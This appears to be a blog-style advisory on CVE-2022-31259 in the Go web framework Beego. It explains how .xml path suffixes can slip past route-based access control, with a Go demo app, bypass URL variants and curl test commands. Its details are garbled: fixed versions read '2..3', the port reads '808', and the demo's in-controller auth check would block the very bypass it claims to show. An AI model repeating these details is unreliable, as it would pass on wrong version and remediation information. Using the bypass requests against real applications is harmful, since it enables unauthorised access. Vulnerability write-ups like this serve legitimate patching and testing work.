CVE-2022-31259 - How Beego Route Lookup Could Let Attackers Bypass Access Control (with Example & Exploit)

Beego is a popular web framework for Go, used by thousands of developers to build modern web applications. In 2022, a security issue—CVE-2022-31259—was uncovered in Beego’s route lookup process. This bug makes the access protection of certain routes weaker than expected, letting attackers sneak past restrictions just by slightly tweaking URLs.

In this post, we’ll break down how this works, walk you through code examples, and show exactly how a malicious actor could exploit it. We'll also share references for deeper dives.

What’s the Problem?

Normally, when you set up a route like /p1/p2/:name in Beego, you expect only URLs that fit that exact pattern to be accessible—for example, /users/profile/john. If you restrict this route, others shouldn’t be able to get in.

But due to CVE-2022-31259, adding .xml to route parts—like using /p1.xml/p2.xml/john.xml—can fool Beego into serving the page, *and bypass any rules or checks you set up.*

Who’s Impacted?

Affected:

Beego 2.x up to (but not including) 2..3

Not Affected/Fixed In:

Beego 2..3 and above

If you’re running legacy code or haven’t upgraded Beego recently, you’re at risk.

How Does the Vulnerability Work?

At its core, the Beego framework did an improper check when matching routes. When a handler is registered for /p1/p2/:name, Beego is too flexible. If an incoming path like /p1.xml/p2.xml/foo.xml comes in, it doesn’t strictly reject it—even though there's no defined handler. Beego “normalizes” the path and matches anyway.

Attackers can intentionally append .xml, .json, or even other dots/extensions in various parts of the path to fool the route matcher. This ends up bypassing any middlewares or access control checks set on the *real* intended route.

Let’s see a minimal example in Go using Beego

package main

import (
    "github.com/beego/beego/v2/server/web"
)

type ProtectedController struct {
    web.Controller
}

func (c *ProtectedController) Get() {
    // Imagine you check if the user is logged in (pseudo-middleware)
    auth := c.GetString("auth")
    if auth != "secret_token" {
        c.Ctx.ResponseWriter.WriteHeader(403)
        c.Ctx.WriteString("Forbidden")
        return
    }
    c.Ctx.WriteString("Sensitive Data!")
}

func main() {
    // Route expects: /data/user/:name
    web.Router("/data/user/:name", &ProtectedController{})
    web.Run()
}

You expect only /data/user/alice?auth=secret_token to succeed.

The Dangerous Bypass

With the vulnerability, an attacker can just throw .xml into the path in various places and still reach your controller—even if access control tries to block it.

Examples

- /data.xml/user.xml/alice.xml
- /data/user/alice.xml
- /data/user.xml/alice
- Even /data.xMl/user/alice (Beego is case-insensitive sometimes!)

And because your protection is only set up for the expected route, these “funky” URLs can skip the check.

Let’s look at how an attacker could automate this

# Assume the real valid route is /data/user/bob
# Simulate a bypass using curl (no auth)

curl http://localhost:808/data.xml/user.xml/bob.xml
# This should NOT be allowed, but Beego may allow it!

curl http://localhost:808/data/user/bob.xml
# Another variant

curl http://localhost:808/data/user.xml/bob
# Yet another variant

If you see “Sensitive Data!” in the response, your app is vulnerable.

Why Does This Happen?

Beego’s internal router “normalizes” URLs too liberally. When you register /data/user/:name, Beego doesn’t enforce exact matches, and ignores trailing file extensions, treating /data/user/bob.xml as if it matches /data/user/:name.  
This comes from trying to be helpful with RESTful design (like /users/123.json), but accidentally opens the door to bypass.

Upgrade Beego: Patch immediately to at least 2..3 (or check your version at or above this).

- Changelog fixing this
- Audit Routes: Look for vulnerable patterns, especially those with parameters (:name) deep in the path and that are protected by custom middleware.
- Test All Variants: Try adding .xml, .json, .txt at each level in the router and see what happens.
- Add Strict Route Guards: If you can’t upgrade, ensure middleware triggers *for all matching routes*, not just the expected “clean” URLs.

References and Further Reading

- Official CVE Details
- Beego Github Issue & Patch
- Beego Official Site
- Security Advisory (GHSA-6jwx-hrr8-864v)

In Summary

CVE-2022-31259 shows how small cracks in routing logic can have very real impacts. If you use Beego, always lock every door, not just the main entrance—especially when route “helpers” could misfire.

Timeline

Published on: 05/21/2022 19:15:00 UTC
Last modified on: 06/02/2022 19:02:00 UTC